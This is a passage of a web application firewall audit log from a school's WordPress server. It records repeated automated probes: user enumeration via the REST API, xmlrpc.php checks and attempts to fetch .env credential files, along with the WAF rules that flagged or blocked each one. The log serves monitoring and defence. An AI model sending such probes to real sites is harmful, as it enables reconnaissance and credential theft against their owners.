X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.166.122 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1383b42e-C-- demo.sayHello --1383b42e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1383b42e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746685225299027 4788 (- - -) Stopwatch2: 1746685225299027 4788; combined=3751, p1=478, p2=3073, p3=23, p4=24, p5=90, sr=92, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1383b42e-Z-- --c6a05b7b-A-- [08/May/2025:13:45:26 +0700] aBxTBo4K347NtBcwXKwHQwAAAJI 103.236.140.4 45178 103.236.140.4 8181 --c6a05b7b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.198.250 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.198.250 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c6a05b7b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c6a05b7b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746686726282620 3186 (- - -) Stopwatch2: 1746686726282620 3186; combined=1395, p1=473, p2=891, p3=0, p4=0, p5=31, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c6a05b7b-Z-- --3cc8ab2e-A-- [08/May/2025:13:45:42 +0700] aBxTFo4K347NtBcwXKwHRAAAAJU 103.236.140.4 45182 103.236.140.4 8181 --3cc8ab2e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.198.250 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.198.250 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3cc8ab2e-C-- demo.sayHello --3cc8ab2e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3cc8ab2e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746686742551077 5280 (- - -) Stopwatch2: 1746686742551077 5280; combined=3592, p1=496, p2=2911, p3=34, p4=33, p5=70, sr=60, sw=48, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3cc8ab2e-Z-- --7ad53f3f-A-- [08/May/2025:13:52:54 +0700] aBxUxqcs1DvJ_HgMHE_ypAAAAAI 103.236.140.4 45226 103.236.140.4 8181 --7ad53f3f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.99.104 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.99.104 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7ad53f3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ad53f3f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746687174097398 3460 (- - -) Stopwatch2: 1746687174097398 3460; combined=1513, p1=529, p2=946, p3=0, p4=0, p5=38, sr=131, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ad53f3f-Z-- --00ff1376-A-- [08/May/2025:13:53:11 +0700] aBxU16cs1DvJ_HgMHE_yqAAAAA4 103.236.140.4 45236 103.236.140.4 8181 --00ff1376-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.99.104 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.99.104 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --00ff1376-C-- demo.sayHello --00ff1376-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --00ff1376-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746687191022516 5170 (- - -) Stopwatch2: 1746687191022516 5170; combined=4175, p1=515, p2=3432, p3=31, p4=44, p5=91, sr=73, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --00ff1376-Z-- --ca7ab314-A-- [08/May/2025:14:03:47 +0700] aBxXU8P9GxxPAbCroFbNcgAAAFQ 103.236.140.4 45282 103.236.140.4 8181 --ca7ab314-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 204.48.19.8 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 204.48.19.8 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; XBLWP7; ZuneWP7) UCBrowser/2.9.0.263 Accept-Charset: utf-8 --ca7ab314-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ca7ab314-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746687827773100 839 (- - -) Stopwatch2: 1746687827773100 839; combined=366, p1=323, p2=0, p3=0, p4=0, p5=43, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ca7ab314-Z-- --89252e28-A-- [08/May/2025:14:03:53 +0700] aBxXWacs1DvJ_HgMHE_ysQAAAAc 103.236.140.4 45284 103.236.140.4 8181 --89252e28-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 204.48.19.8 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 204.48.19.8 X-Forwarded-Proto: https Connection: close User-Agent: iTunes/9.0.2 (Windows; N) Accept-Charset: utf-8 --89252e28-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --89252e28-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746687833037942 853 (- - -) Stopwatch2: 1746687833037942 853; combined=363, p1=319, p2=0, p3=0, p4=0, p5=44, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --89252e28-Z-- --1434520e-A-- [08/May/2025:14:38:13 +0700] aBxfZacs1DvJ_HgMHE8GPQAAABU 103.236.140.4 53874 103.236.140.4 8181 --1434520e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.193.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.193.153 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1434520e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1434520e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746689893257585 2964 (- - -) Stopwatch2: 1746689893257585 2964; combined=1384, p1=440, p2=881, p3=0, p4=0, p5=54, sr=72, sw=9, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1434520e-Z-- --d680be59-A-- [08/May/2025:14:38:30 +0700] aBxfdqcs1DvJ_HgMHE8GgQAAAAc 103.236.140.4 54594 103.236.140.4 8181 --d680be59-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.193.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.193.153 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d680be59-C-- demo.sayHello --d680be59-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d680be59-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746689910789399 5830 (- - -) Stopwatch2: 1746689910789399 5830; combined=4334, p1=558, p2=3564, p3=30, p4=34, p5=88, sr=75, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d680be59-Z-- --a6410418-A-- [08/May/2025:14:40:53 +0700] aBxgBY4K347NtBcwXKwZSAAAAJc 103.236.140.4 60410 103.236.140.4 8181 --a6410418-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 209.38.248.17 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 209.38.248.17 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --a6410418-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6410418-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746690053271062 803 (- - -) Stopwatch2: 1746690053271062 803; combined=332, p1=293, p2=0, p3=0, p4=0, p5=39, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6410418-Z-- --7887b735-A-- [08/May/2025:14:42:12 +0700] aBxgVKcs1DvJ_HgMHE8JQAAAAAU 103.236.140.4 35402 103.236.140.4 8181 --7887b735-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.171.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.171.223 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7887b735-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7887b735-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746690132021621 2830 (- - -) Stopwatch2: 1746690132021621 2830; combined=1253, p1=435, p2=787, p3=0, p4=0, p5=31, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7887b735-Z-- --57075771-A-- [08/May/2025:14:42:19 +0700] aBxgW8P9GxxPAbCroFbeIwAAAEo 103.236.140.4 35696 103.236.140.4 8181 --57075771-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.171.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.171.223 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --57075771-C-- demo.sayHello --57075771-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --57075771-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746690139046980 4563 (- - -) Stopwatch2: 1746690139046980 4563; combined=3105, p1=418, p2=2520, p3=27, p4=28, p5=65, sr=49, sw=47, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --57075771-Z-- --bf58e775-A-- [08/May/2025:14:42:33 +0700] aBxgaSs5rYyn3jlLjjLPFgAAANA 103.236.140.4 36288 103.236.140.4 8181 --bf58e775-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.61.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.61.196 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bf58e775-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bf58e775-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746690153071538 2153 (- - -) Stopwatch2: 1746690153071538 2153; combined=1155, p1=409, p2=719, p3=0, p4=0, p5=27, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf58e775-Z-- --27d7ac18-A-- [08/May/2025:14:42:36 +0700] aBxgbCs5rYyn3jlLjjLPFwAAAM0 103.236.140.4 36428 103.236.140.4 8181 --27d7ac18-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 119.40.90.85 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 119.40.90.85 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --27d7ac18-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --27d7ac18-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746690156563017 3029 (- - -) Stopwatch2: 1746690156563017 3029; combined=1289, p1=425, p2=835, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --27d7ac18-Z-- --bfea2d33-A-- [08/May/2025:14:42:42 +0700] aBxgco4K347NtBcwXKwaagAAAIE 103.236.140.4 36662 103.236.140.4 8181 --bfea2d33-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.61.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.61.196 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --bfea2d33-C-- demo.sayHello --bfea2d33-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --bfea2d33-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746690162387503 5273 (- - -) Stopwatch2: 1746690162387503 5273; combined=3902, p1=482, p2=3218, p3=28, p4=32, p5=83, sr=60, sw=59, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bfea2d33-Z-- --f006d458-A-- [08/May/2025:14:44:17 +0700] aBxg0cP9GxxPAbCroFbfVAAAAFY 103.236.140.4 40508 103.236.140.4 8181 --f006d458-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.202 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.202 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f006d458-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f006d458-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746690257009584 2506 (- - -) Stopwatch2: 1746690257009584 2506; combined=1465, p1=459, p2=974, p3=0, p4=0, p5=32, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f006d458-Z-- --a986a804-A-- [08/May/2025:14:44:24 +0700] aBxg2Kcs1DvJ_HgMHE8LGwAAAAE 103.236.140.4 40824 103.236.140.4 8181 --a986a804-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.202 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.202 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a986a804-C-- demo.sayHello --a986a804-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a986a804-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746690264619261 5299 (- - -) Stopwatch2: 1746690264619261 5299; combined=3895, p1=447, p2=3254, p3=25, p4=28, p5=86, sr=59, sw=55, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a986a804-Z-- --16c39a5d-A-- [08/May/2025:14:44:36 +0700] aBxg5MP9GxxPAbCroFbfdgAAAEo 103.236.140.4 41324 103.236.140.4 8181 --16c39a5d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.90.207 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.90.207 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --16c39a5d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --16c39a5d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file 